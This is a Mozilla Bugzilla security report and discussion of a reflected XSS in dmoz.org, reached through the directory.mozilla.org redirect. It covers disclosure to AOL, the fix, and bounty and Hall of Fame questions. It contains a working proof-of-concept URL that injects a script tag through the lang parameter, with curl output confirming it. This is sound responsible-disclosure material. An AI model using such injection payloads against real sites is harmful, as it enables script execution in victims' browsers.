Closed
Bug 1329483
Opened 8 years ago
Closed 8 years ago
example xss in directory.mozilla.org
Categories
(Websites :: Other, defect)
Websites
Other
Tracking
(Not tracked)
RESOLVED
FIXED
People
(Reporter: honcbb, Unassigned)
References
()
Details
(Keywords: reporter-external, sec-moderate, wsec-xss, Whiteboard: [reporter-external] [web-bounty-form] [verif?])
Attachments
(2 files)
DOM XSS
Firefox 、IE Payload :http://www.dmoz.org/public/abuse?t=arts&cat=Arts/Television&lang=en%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
directory.mozilla.org 302 > http://www.dmoz.org/
Flags: sec-bounty?
|
||
Comment 1•8 years ago
|
||
# directory.mozilla.org redirects to www.dmoz.org
$ curl -i directory.mozilla.org
HTTP/1.1 302 Found
Server: Apache
X-Backend-Server: pp-web03
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 09 Jan 2017 14:28:13 GMT
Location: http://www.dmoz.org/
X-Cache-Info: not cacheable; response is 302 without expiry time
Content-Length: 204
# Results in a reflected XSS payload like so...
$ curl -i 'http://www.dmoz.org/public/abuse?t=arts&cat=Arts/Television&lang=en%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
HTTP/1.1 200 OK
Date: Mon, 09 Jan 2017 14:29:51 GMT
Server: Apache
...SNIP...
Content-Language: en-US
Content-Length: 9330
Connection: close
Content-Type: text/html;charset=UTF-8
...SNIP...
<input type="hidden" name="lang" value=en"><script>alert(document.domain)</script> ></input>
...SNIP...
Status: UNCONFIRMED → NEW
Ever confirmed: true
|
|
||
Comment 2•8 years ago
|
||
|
|
||
Comment 3•8 years ago
|
||
This is a valid relfected XSS payload for this site. There is a login for the page, but I'm not sure whether we have a large number of users visiting the site. Setting the severity to moderate for the time being.
Keywords: sec-moderate,
wsec-xss
|
||
Comment 4•8 years ago
|
||
Is this a Mozilla site? I know we redirect there, but I believe it's owned and operated by AOL.
|
||
Comment 5•8 years ago
|
||
It was once known as directory.mozilla.org but it's owned by AOL, it's not ours. April's right.
The XSS works through the redirect as well.
Given that we don't control the site, I'm not sure we should be 302-ing to it given possible reputational risk . We all know the technical risks but this is a policy question we should probably kick to the bounty meeting.
$ curl -i "http://directory.mozilla.org/public/abuse?t=arts&cat=Arts/Television&lang=en%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
HTTP/1.1 302 Found
Server: Apache
X-Backend-Server: pp-web01
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 09 Jan 2017 16:38:38 GMT
Location: http://www.dmoz.org/public/abuse?t=arts&cat=Arts/Television&lang=en%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
X-Cache-Info: not cacheable; response is 302 without expiry time
Content-Length: 312
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.dmoz.org/public/abuse?t=arts&cat=Arts/Television&lang=en%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E">here</a>.</p>
</body></html>
|
|
||
Comment 6•8 years ago
|
||
This is not our site, we might take away the redirect and alert security@aol.com to let them know about this issue.
Flags: sec-bounty? → sec-bounty-
|
|
||
Comment 7•8 years ago
|
||
:fox2mike - would it be possible to get stats on how many DNS queries we get for directory.mozilla.org? Trying to establish a metric to suggest whether it's in use or not since it redirects to a site operated by AOL.
Also, I'm sending AOL security an email now to alert them of the reflected XSS.
|
|
||
Updated•8 years ago
|
Flags: needinfo?(smani)
|
|
||
Comment 8•8 years ago
|
||
AOL Security team has responded and confirmed the XSS issue on their end and are working with their internal teams to resolve. If they provide any other updates, I'll capture them in this bug.
Honc: in case it wasn't clear earlier, I credited you in the email I sent to AOL Security in case they would like to offer you a bounty or HoF mention. Thanks again for the report!
|
Reporter | |
Comment 10•8 years ago
|
||
Because I was through the Google search engine "site:*.Mozilla.org" imported into directory.Mozilla.org 302 into http://www.DMOZ.org/
|
|
Reporter | |
Comment 11•8 years ago
|
||
I find that this vulnerability has been fixed, does the team have any response?
|
|
||
Comment 12•8 years ago
|
||
I have confirmed the original PoC for the XSS issue appears to have been fixed by AOLs security team.
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
|
|
Reporter | |
Comment 13•8 years ago
|
||
ok Thanks
|
|
Reporter | |
Comment 14•8 years ago
|
||
Hey Mozila Firefox Security Team
Ask again!
After how long this problem has been patched, AOL team says any reward?
|
|
||
Comment 15•8 years ago
|
||
Honc: I'll CC you into the email thread with AOL so you can ask them about a bounty.
|
|
Reporter | |
Comment 16•8 years ago
|
||
ok , Thanks you
|
|
||
Comment 17•8 years ago
|
||
Honc was acknowledged on AOL's Security Hall of Fame for this issue:
https://contact.security.aol.com/hof/
|
|
||
Updated•8 years ago
|
Group: websites-security
Flags: needinfo?(smani)
|
|
Reporter | |
Comment 18•8 years ago
|
||
OK,i know,Very Thanks you~
|
||
Updated•1 year ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•